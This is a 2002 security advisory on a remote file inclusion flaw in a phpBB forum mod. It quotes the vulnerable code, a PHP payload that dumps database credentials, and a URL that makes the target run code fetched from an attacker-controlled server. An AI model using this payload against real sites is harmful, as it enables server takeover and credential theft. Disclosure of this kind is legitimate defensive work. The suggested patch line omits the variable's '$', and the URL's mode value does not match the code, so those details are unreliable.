phpBB 'Advanced Quick Reply' Hack Input Validation Flaw Lets Remote Users Execute Commands on the Server
|
|
SecurityTracker Alert ID: 1005643 |
|
SecurityTracker URL: http://securitytracker.com/id/1005643
|
|
CVE Reference:
GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Nov 16 2002
|
Impact:
Execution of arbitrary code via network, User access via network
|
Exploit Included: Yes
|
Version(s): 1.1
|
Description:
An input validation vulnerability was reported in the Advanced Quick Reply hack for the phpBB forum. A remote user can execute shell commands on the server.
It is reported that a remote user can cause remotely located PHP scripts to be executed on the target server because of a flaw in specifying the target directory for the '$phpbb_root_path' variable.
To exploit this, the user must create malicious PHP code on an arbitrary remote server (a server that the remote user controls or has access to). Then, the remote user can send a specially crafted URL to the target web server to cause the target web server to execute the malicious PHP code. The code will be executed with the privileges of the web server process.
As a demonstration exploit, the user can create a file 'extension.inc' on 'YourServer' and then call the following URL to cause the PHP code in 'extension.inc' to be executed on the target phpBB server:
http://[phpBB_Forum]/quick_reply.php?phpbb_root_path=http://[YourServer]/&mode=smiles
|
Impact:
A remote user can execute arbitrary shell commands on the server with the privileges of the web daemon.
|
Solution:
No solution was available at the time of this entry. The author of the report has provided an unofficial patch, available in the Source Message.
|
Vendor URL: phpbbhacks.com/viewhack.php?id=586 (Links to External Site)
|
Cause:
Input validation error
|
Underlying OS:
Linux (Any), UNIX (Any), Windows (Any)
|
|
Message History:
None.
|
Source Message Contents
|
Date: 13 Nov 2002 07:49:25 -0000
Subject: Code Injection in phpBB Advanced Quick Reply Mod
|
Software: phpBB Advanced Quick Reply Mod
I've found a security hole in this sofware (Code Injection). You can
download this software at http://phpbbhacks.com/viewhack.php?id=586
Hackers can exploit this Mod to inject some shell code to hack your forum,
your website or your server (local exploit) because Code Injection is a
dangerous technique of hackers.
Exploit: (quick_reply.php)
if ( $mode == 'smilies' )
{
define('IN_PHPBB', true);
include($phpbb_root_path . 'extension.inc');
include($phpbb_root_path . 'common.'.$phpEx);
include($phpbb_root_path . 'includes/functions_post.'.$phpEx);
generate_smilies('window', PAGE_POSTING);
exit;
}
And you can make a php file which named 'extension.inc' to inclusion to
access that forum. example:
<?php
include('config'.'.php');
echo "DB Type: $dbms <br>";
echo "DB Host: $dbhost <br>";
echo "DB Name: $dbname <br>";
echo "DB User: $dbuser <br>";
echo "DB Pass: $dbpasswd <br>";
exit;
?>
After that, you upload this file to your server (http://[Your
Server]/extension.inc) and enter URL
http://[phpBB_Forum]/quick_reply.php?phpbb_root_path=http://[Your
Server]/&mode=smiles
You'll be recived all DB Info of forum
Patch: (quick_reply.php)
[FIND]
if ( $mode == 'smilies' )
{
[ADD BEFORE]
phpbb_root_path = "./";
Sorry for my poor english.
Luke (HVA)
http://www.hackervn.net
|
|
